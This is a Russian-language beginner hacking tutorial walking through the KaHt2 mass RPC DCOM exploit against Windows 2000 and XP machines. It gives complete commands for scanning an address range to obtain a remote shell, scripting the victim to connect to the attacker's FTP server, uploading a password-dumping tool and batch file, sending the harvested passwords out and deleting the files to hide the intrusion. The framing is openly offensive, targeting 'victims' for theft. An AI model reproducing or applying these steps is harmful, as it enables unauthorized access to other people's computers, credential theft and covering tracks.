KaHt2 Берем что хотим
[ Хакерство для новичков ] 


НУ так вот приступим: КаХт2!
Этот эксплоит испульзует всем известную дырку RPC DCOM в виндуса 2000 и ХП. Дырка эта конечно старая, и уже выпущенно большое количество исправлений. Но она остаётся актуальной (по крайней мере на моём прове много кого можно найти с этой темой). И мы можем пользоваться этой дырой до тех пор пока в сети будут сидеть под вынь 2000 и ХП.
Короче, что нам понадобится? Да практически ничего, а именно это сам КаНт2, потом PassViev (только PRO версия, иначе ничего не получится) и естесственно программа FTP сервер, под названием pablos_ftp_server (я использовал версию 1_52). Ну вот и всё. Значит ищем всё это в инете. НАшли? Продолжаем.

Для удобства пользования Размещаем софт по винту в определённом порядке. Сам FTPServer, kaHt2.exe и EXPORT.BAT ставим в директорию C:/., А PassViev cуём в папку C:/TEMP (Если её нет, то создайте сами) и переименовываем PassViev.exe в 6.exe (для большего удобства), или в любое другое, на ваш выбор, главное что бы вы потом не мучались набирать это в командной строке.

EXPORT.BAT должен находится в одном архиве с КаХтом, если же всё-таки не нашли то создаём EXPORT.BAT файл своими руками в любимом блокноте с текстом 

@Echo off
6.exe Export.txt

и сохраняем как EXPORT.BAT. Всё Батник готов. Заметьте: во второй строке стоит 6.exe, это то имя в которое вы переименовали свой PassViev. Если Вы переименовали в другое то в напишите именно его в батнике EXPORT.BAT.

Теперь давайте настроим FTP сервер на своём компутере. Запустите FTPServer и войдите в User accounts, нажимаем ADD, Вас просят ввести имя юзера, пишем: a. Далее вас просят выбрать каталог куда будут заливатся стыренные файлы, выберете папку темп которую мы недавно с Вами создавали на диске ЦЕ. Потом Вас просят ввести пароль для юзера a, парольставим тоже: a. Потом проставляем везде галочки. Теперь все изменения сохраняем и приступаем к основным действиям.

Открываем диск C:, убеждаемся что там присутствует КаХт. Потом Запускаем командную строку (пуск>программы>стандартные>командная строка). Перетаскиваем КаХт с папки в комндную строку (нажмите на КаХт левой кнопкой мыши и перетеащите в окно консоли).
Далее появляется текст: C:>C:kahHt2.exe
Продолжаем эту строку: пробел 
Должно получится: C:>C:kaHt2.exe 192.168.0.1 192.168.0.245 (пример на моей локалке, у Вас же диапазон может быть другой) 
Жмём Enter.

Перед Вами появляется:
___________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION :P
____________________________________________
[+] tARGETS : 192.168.0.1-192.168.0.245 WITH 50 tHREADS
[+] Attacking Port: 135. Remote Shell port: 32968
[+] Scan In Progress...
- Connecting to 192.168.0.8
Sending Exploit to a [WinXP] Server... FAILED
- Connecting to 192.168.0.13

ну короче говоря ещё всякое дерьмо появится которое нам не надо. В итоге когда сканер найдёт потенциальную жертву появится :

Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
C:windowssystem32>

Всё, можешь радоваться, ты на чужом компе в директории SYSTEM32.
Далее в консоли пишем:
cd.. Жмём Enter видим C:windows>
cd..Жмём Enter видим C:

Теперь с помощью команды cd program files перейдём в папку С:Program Files.
Видим:
C:Program files сюда мы перешли чтоб особо не палится
Далее узнаём свой IP адрес. Для премера будем использовать мой в локалке 192.168.0.7
Пишем в консоли:
C:Program files>echo open 57.66.158.44>go.txt&&echo a>>go.txt&&echo a>>go.txt 
жмем Enter
Видим: C:Program files>
Это мы с Вами создали текстовый документ (он нам понадобится для соединения с вашим FTP сервером) в папке Program files на удалённой машине, в котором содержится 3 строки:
open 57.66.158.44
a
a
Буквы a, это имя и пароль которые Вы создали в FTPServer`е.

Теперь запускаем FTPServer , нажимаем на зелёную стрелочку в левом верхнем углу программы. Вам написали, что сервер запущен.
Теперь коннектим удалённый комп к себе по FTP.
Пишем в командной строке:
C:Program files>ftp -s:go.txt
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:

FTP Server started on port 21
[3892] Client connected from IP
[3892] Welcome to Pablo's FTP Server
[3892] USER a
[3892] 331 Password required for a
[3892] PASS a
[3892] 230 User successfully logged in.

Это всё означает, что ты всё правильно сделал и законнектил вражеский комп к себе на ФТП, далее на надо залить PAssView.exe (мы переименовали его в 6.exe) на этот комп.
Пишем get 6.exe жмём Enter
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR 6.exe
[1456] 150 Opening BINARY mode data connection for file transfer
[1456] 226 Transfer complee

В консоли Пишем get export.bat жмём Enter - это мы отправили наш батник, видим В своём FTP сервере, в раздел Server Log ты должен увидеть следующее
[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR Export.bat
[1456] 150 Opening BINARY mode data connection for file transfer
[1456] 226 Transfer complee

Всё, мы отправили необходимые файлы на комп жертвы.
Теперь пишем bye - это мы отсоединяем комп от нашего ФТП сервера.

и снова мы видим:
C:Program files>
Пишем C:Program files>export.bat это мы запустили export.bat который соберёт нам все наши пароли и сохранит их в файле export.txt
Для больше уверенности в том что export.txt уже создан наберите в консоли:
C:Program files>dir
И Вы увидите все файлы и папки в директории C:Program files, там же увидите и наши закаченные файлы.

И наконец последний шаг.
Снова коннектим комп по ФТП:
C:Program files>ftp -s:go.txt жмём Enter
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
Вы снова увидите:
FTP Server started on port 21
[3892] Client connected from IP
[3892] Welcome to Pablo's FTP Server
[3892] USER a
[3892] 331 Password required for a
[3892] PASS a
[3892] 230 User successfully logged in.

Сразу после этого в консоли вводите:
send export.txt
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR export.txt
[1456] 150 Opening BINARY mode data connection for file transfer.
[1456] 226 Transfer complete

Это означает что мы скопривали себе в папку TEMP,которую создавали на диске ЦЕ, файл export.txt

Далее заметаем следы:
пишем bye жмём ввод
И снова видим: 
C:Program files>
Далее поочерёдно вводим команды для удаления закаченных нами файлов:
del go.txt
del 6.exe
del export.bat
del export.txt

Ну вот и всё. 

Удачи!

Tarakanizator (aka Alexdirty) mazafuckin@mail.ru